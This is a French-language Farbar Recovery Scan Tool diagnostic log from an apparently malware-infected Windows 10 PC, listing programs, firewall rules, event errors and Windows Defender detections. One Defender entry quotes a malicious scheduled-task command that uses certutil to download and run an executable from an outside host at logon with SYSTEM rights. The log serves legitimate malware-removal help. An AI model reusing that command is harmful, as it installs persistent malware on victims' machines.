cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 22-12-2019
Exécuté par Maël (22-12-2019 18:31:46)
Exécuté depuis C:\Users\Maël\Desktop
Windows 10 Enterprise Version 1803 17134.1184 (X64) (2019-11-16 17:57:28)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-3517242231-1405562412-4047506948-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3517242231-1405562412-4047506948-503 - Limited - Disabled)
Invité (S-1-5-21-3517242231-1405562412-4047506948-501 - Limited - Disabled)
Maël (S-1-5-21-3517242231-1405562412-4047506948-1001 - Administrator - Enabled) => C:\Users\Maël
WDAGUtilityAccount (S-1-5-21-3517242231-1405562412-4047506948-504 - Limited - Disabled)

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

µTorrent (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\uTorrent) (Version: 3.5.5.45395 - BitTorrent Inc.)
CloudNet (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Discord (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\Discord) (Version: 0.0.305 - Discord Inc.)
Epic Games Launcher (HKLM-x32\...\{6653362F-9365-4A3C-9BF8-71494529DE06}) (Version: 1.1.236.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
FiveM (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\CitizenFX_FiveM) (Version: - The CitizenFX Collective)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.88 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.421 - Google LLC) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\...\OneDriveSetup.exe) (Version: 19.192.0926.0012 - Microsoft Corporation)
NordVPN (HKLM-x32\...\{1F65DF2C-97B0-402F-A484-FDEC48DB63A1}) (Version: 6.26.7 - NordVPN) Hidden
NordVPN (HKLM-x32\...\NordVPN 6.26.7) (Version: 6.26.7 - NordVPN)
NordVPN network TAP (HKLM-x32\...\{97DEC5D6-2BE9-45BB-BFC5-274B851B486B}) (Version: 1.0.1 - NordVPN)
Panneau de configuration NVIDIA 441.12 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 441.12 - NVIDIA Corporation) Hidden
pdfreader2019 version 20.01 (HKLM-x32\...\{992AED7A-14D8-43BC-A658-83D250F99526}_is1) (Version: 20.01 - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)

Packages:
=========
Bureau à distance Microsoft -> C:\Program Files\WindowsApps\Microsoft.RemoteDesktop_10.1.1107.0_x86__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation)
iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa [2019-12-12] (Apple Inc.) [Startup Task]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-16] (Microsoft Corporation) [MS Ad]
Microsoft News: les actualités à ne pas manquer -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.5.12061.0_x64__8wekyb3d8bbwe [2019-12-11] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.6.23362.0_x64__8wekyb3d8bbwe [2019-12-05] (Microsoft Corporation)
Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_19.11125.4599.0_x64__8wekyb3d8bbwe [2019-12-15] (Microsoft Corporation)
MSN Météo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad]
Network Speed Test -> C:\Program Files\WindowsApps\Microsoft.NetworkSpeedTest_1.0.0.23_x64__8wekyb3d8bbwe [2019-11-16] (Microsoft Research)

==================== Personnalisé CLSID (Avec liste blanche): ==============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-10-24] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Avec liste blanche) ====================

==================== Raccourcis & WMI ========================

==================== Modules chargés (Avec liste blanche) =============

2019-10-16 05:32 - 2019-10-16 05:32 - 000262656 _____ () [Fichier non signé] C:\Program Files (x86)\NordVPN\x86\Liberation.Native.Firewall.dll
2019-12-22 16:16 - 2019-12-22 16:16 - 000014848 _____ () [Fichier non signé] C:\Users\Maël\AppData\Local\vinkoo.dll
2019-11-16 19:13 - 2019-11-16 19:14 - 098275328 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libcef.dll
2019-11-16 19:14 - 2019-11-16 19:14 - 000092672 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libEGL.dll
2019-11-16 19:14 - 2019-11-16 19:14 - 003922432 _____ () [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\libGLESv2.dll
2019-11-16 19:12 - 2019-11-16 19:13 - 000547840 _____ (The Chromium Authors) [Fichier non signé] D:\Epic Games\Launcher\Engine\Binaries\ThirdParty\CEF3\Win64\chrome_elf.dll

==================== Alternate Data Streams (Avec liste blanche) ========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)

AlternateDataStreams: C:\Users\Maël\ntuser.ini:NTV [12390]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [474]

==================== Mode sans échec (Avec liste blanche) ==================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Avec liste blanche) =================

==================== Internet Explorer sites de confiance/sensibles ==========

==================== Hosts contenu: =========================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2019-11-16 16:32 - 2019-11-16 16:30 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Autres zones ===========================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-3517242231-1405562412-4047506948-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

==================== RèglesPare-feu (Avec liste blanche) ================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{F02CF6B4-81F4-4561-BA79-001561ADFC0E}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> )
FirewallRules: [{20CB2C3A-D73A-4542-A86E-4D24C6E05FFF}] => (Allow) C:\Riot Games\League of Legends\LeagueClient.exe (Riot Games, Inc. -> )
FirewallRules: [{7050A7F1-9FD4-4AE5-A796-95599E58E1F6}] => (Allow) C:\Users\Maël\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{C456B090-AEA5-4F88-9ED6-6E58C856CBE4}] => (Allow) C:\Users\Maël\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{DE0ECC09-0655-4555-A36F-46D6E3047F60}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe Pas de fichier
FirewallRules: [{ABD60CB5-C5BF-4BA8-BBAF-DF1B8037114A}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Pas de fichier
FirewallRules: [{B3DC314F-9F54-4BC8-AE17-FD1E340259C5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{4CE39A55-7C7D-4A1F-919C-D9149DEA7C3C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{89CE58CB-F5C6-416C-9DCF-1D6629EC9B3E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [{42047E1F-8276-428C-9D28-0F9676DAE4A4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [TCP Query User{5F4B5C77-7C4F-41F0-8454-3929640A4A65}D:\runtime\jre-x64\bin\javaw.exe] => (Allow) D:\runtime\jre-x64\bin\javaw.exe Pas de fichier
FirewallRules: [UDP Query User{BE1B1804-E5DE-4F2A-901E-DB38082640D8}D:\runtime\jre-x64\bin\javaw.exe] => (Allow) D:\runtime\jre-x64\bin\javaw.exe Pas de fichier
FirewallRules: [TCP Query User{2ECF84F0-1B49-4471-A73B-BA237EB5C5E5}C:\riot games\league of legends\game\league of legends.exe] => (Allow) C:\riot games\league of legends\game\league of legends.exe (Riot Games, Inc. -> )
FirewallRules: [UDP Query User{E6716072-585A-4874-994A-4EC1680BCBCC}C:\riot games\league of legends\game\league of legends.exe] => (Allow) C:\riot games\league of legends\game\league of legends.exe (Riot Games, Inc. -> )
FirewallRules: [{BAE31A0B-CBE5-4C19-9B06-1132F72809F5}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{B706C61F-6122-4175-ACC4-4730B8CB6B0F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{F0836357-43EB-425F-82D6-D815A7997AEA}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{238B530D-13E8-40F1-9D39-6CF0607EB7CB}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{AECDB459-13C0-46DD-B874-8A65FD893133}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CD1522BF-0BC3-4E81-A914-C10B7CFFC8A3}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D8784393-0CD8-4286-9D49-4782B9B07EF5}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{DDD59B34-585C-4881-B720-2176814B7945}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{0884C9C4-0C97-4153-BBBE-B358CF8F5764}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{D077D336-29D8-4BE0-B4B2-DC93881400D2}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12103.1.43048.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6081CB5F-B9E1-4F72-BB61-2C7017A42794}] => (Allow) D:\SteamLibrary\steamapps\common\Grand Theft Auto V\PlayGTAV.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [{BCFD6EC1-D0C7-4126-9927-DDF6C6DFE040}] => (Allow) D:\SteamLibrary\steamapps\common\Grand Theft Auto V\PlayGTAV.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [TCP Query User{49BEF592-1577-4CEB-813B-0849B3635D1A}C:\users\maël\appdata\local\fivem\fivem.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.exe (cfx-collective) [Fichier non signé]
FirewallRules: [UDP Query User{23981262-41A9-47CB-B119-386968A2D135}C:\users\maël\appdata\local\fivem\fivem.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.exe (cfx-collective) [Fichier non signé]
FirewallRules: [TCP Query User{BC7BE127-F558-4324-8FC5-80273C28A17B}C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe (cfx-collective) [Fichier non signé]
FirewallRules: [UDP Query User{A1A159A6-18B1-4B42-8C8D-2EE16EDC1C27}C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe] => (Allow) C:\users\maël\appdata\local\fivem\fivem.app\cache\subprocess\fivem_gtaprocess.exe (cfx-collective) [Fichier non signé]
FirewallRules: [{651AF9EB-BF41-4474-BCEF-8C4C38FD7F00}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D7699BD7-1E5E-40B0-8317-8D4C829DB1FC}] => (Allow) C:\Windows\rss\csrss.exe () [Fichier non signé]
FirewallRules: [{7EEBF6B3-92D3-433F-B43F-AB836CFCFB8F}] => (Allow) C:\Users\Maël\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [Fichier non signé]
FirewallRules: [{DECE9CE9-9BDF-402B-ACBD-A29352E9BABE}] => (Allow) C:\ProgramData\winnmgr\svcnetwk.exe Pas de fichier
FirewallRules: [{EF1FC622-B1B0-412F-AC64-04583367AF54}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Points de restauration =========================

ATTENTION: La Restauration système est désactivée (Total:58.67 GB) (Free:13.32 GB) (23%)

==================== Éléments en erreur du Gestionnaire de périphériques ============


==================== Erreurs du Journal des événements: ========================

Erreurs Application:
==================
Error: (12/22/2019 05:44:48 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: La création du contexte d’activation a échoué pour « C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ». Erreur dans le fichier de manifeste ou de stratégie « C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe » à la ligne 0.
Syntaxe XML non valide.

Error: (12/22/2019 04:48:34 PM) (Source: EventSvc) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/22/2019 04:38:04 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-QIKLCL4)
Description: httphttp-2147467263

Error: (12/22/2019 04:37:55 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-QIKLCL4)
Description: httphttp-2147467263

Error: (12/22/2019 04:29:18 PM) (Source: EventSvc) (EventID: 0) (User: )
Description: Event-ID 0

Error: (12/22/2019 04:17:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante wyfdggm.exe, version : 0.0.0.0, horodatage : 0x5dfd76b3
Nom du module défaillant : ntdll.dll, version : 10.0.17134.799, horodatage : 0x636bcb43
Code d’exception : 0xc0000374
Décalage d’erreur : 0x000d8519
ID du processus défaillant : 0x1630
Heure de début de l’application défaillante : 0x01d5b8daf48480ef
Chemin d’accès de l’application défaillante : C:\Users\Maël\AppData\Local\Temp\qdd4qw4ndre\wyfdggm.exe
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : bcf13d1f-cfe9-4fe8-9456-a22b2df646ed
Nom complet du package défaillant :
ID de l’application relative au package défaillant :

Error: (12/22/2019 04:17:45 PM) (Source: ESENT) (EventID: 333) (User: )
Description: wyfdggm (5680,D,100) d: The database [C:\Program Files (x86)\Forja\d] version 1568.60.140 is higher than the maximum version configured by the application 1568.20.0. Current engine format version parameter setting: 0x40000001 (JET_efvUseEngineDefault)

Error: (12/22/2019 04:17:45 PM) (Source: ESENT) (EventID: 333) (User: )
Description: wyfdggm (5680,D,100) d: The database [C:\Program Files (x86)\Forja\d] version 1568.60.140 is higher than the maximum version configured by the application 1568.20.0. Current engine format version parameter setting: 0x40000001 (JET_efvUseEngineDefault)


Erreurs système:
=============
Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Exécution pour l’application serveur COM avec le CLSID
Windows.SecurityCenter.WscDataProtection
et l’APPID
Non disponible
au SID AUTORITE NT\Système de l’utilisateur (S-1-5-18) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Exécution pour l’application serveur COM avec le CLSID
Windows.SecurityCenter.WscBrokerManager
et l’APPID
Non disponible
au SID AUTORITE NT\Système de l’utilisateur (S-1-5-18) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/22/2019 06:18:12 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
et l’APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/22/2019 06:16:43 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
et l’APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service nordvpn-service s’est terminé de manière inattendue. Ceci s’est produit 2 fois. L’action corrective suivante va être effectuée dans 60000 millisecondes : Redémarrer le service.

Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service VIA Karaoke digital mixer Service s’est terminé de façon inattendue pour la 1ème fois.

Error: (12/22/2019 06:15:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service NVIDIA Display Container LS s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 6000 millisecondes : Redémarrer le service.

Error: (12/22/2019 06:10:40 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-QIKLCL4)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
et l’APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
au SID DESKTOP-QIKLCL4\Maël de l’utilisateur (S-1-5-21-3517242231-1405562412-4047506948-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.


Windows Defender:
===================================
Date: 2019-12-22 18:28:15.722
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Conteban.B!ml&threatid=2147735507&enterprise=0
Nom : Trojan:Win32/Conteban.B!ml
ID : 2147735507
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.307.955.0, AS: 1.307.955.0, NIS: 1.307.955.0
Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-12-22 18:16:26.877
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nom : Trojan:Win32/Ceprolad.A
ID : 2147726914
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://imaginemix.ru/app/app.exe C:\Users\Maël\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Maël\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0
Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-12-22 18:16:25.384
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0
Nom : Program:Win32/Contebrew.A!ml
ID : 251873
Gravité : Moyenne
Catégorie : Logiciel potentiellement non désiré
Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0
Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-12-22 18:02:03.393
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0
Nom : Program:Win32/Contebrew.A!ml
ID : 251873
Gravité : Moyenne
Catégorie : Logiciel potentiellement non désiré
Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : C:\Users\Maël\Desktop\FRST64.exe
Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0
Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7

Date: 2019-12-22 17:58:54.448
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Program:Win32/Contebrew.A!ml&threatid=251873&enterprise=0
Nom : Program:Win32/Contebrew.A!ml
ID : 251873
Gravité : Moyenne
Catégorie : Logiciel potentiellement non désiré
Chemin : file:_C:\Users\Maël\AppData\Local\K--Lam.bin
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : C:\Users\Maël\Desktop\FRST64.exe
Version de la signature : AV: 1.307.944.0, AS: 1.307.944.0, NIS: 1.307.944.0
Version du moteur : AM: 1.1.16600.7, NIS: 1.1.16600.7

CodeIntegrity:
===================================

Date: 2019-11-16 18:56:20.667
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe because the set of per-page image hashes could not be found on the system.

Date: 2019-11-16 18:56:20.663
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe because the set of per-page image hashes could not be found on the system.

==================== Infos Mémoire ===========================

BIOS: American Megatrends Inc. 0602 11/13/2009
Carte mère: ASUSTeK Computer INC. P7P55 LX
Processeur: Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz
Pourcentage de mémoire utilisée: 38%
Mémoire physique - RAM - totale: 8183.05 MB
Mémoire physique - RAM - disponible: 5032.32 MB
Mémoire virtuelle totale: 9783.05 MB
Mémoire virtuelle disponible: 5193.12 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:58.67 GB) (Free:13.32 GB) NTFS
Drive d: () (Fixed) (Total:298.09 GB) (Free:136.93 GB) NTFS

\\?\Volume{103339d0-0000-0000-0000-100000000000}\ (Réservé au système) (Fixed) (Total:0.49 GB) (Free:0.46 GB) NTFS
\\?\Volume{103339d0-0000-0000-0000-00ca0e000000}\ () (Fixed) (Total:0.47 GB) (Free:0.08 GB) NTFS

==================== MBR & Table des partitions ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 59.6 GB) (Disk ID: 103339D0)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=58.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=479 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 7C51E846)
Partition 1: (Not Active) - (Size=298.1 GB) - (Type=07 NTFS)

==================== Fin de Addition.txt =======================

Publicité


Signaler le contenu de ce document

Publicité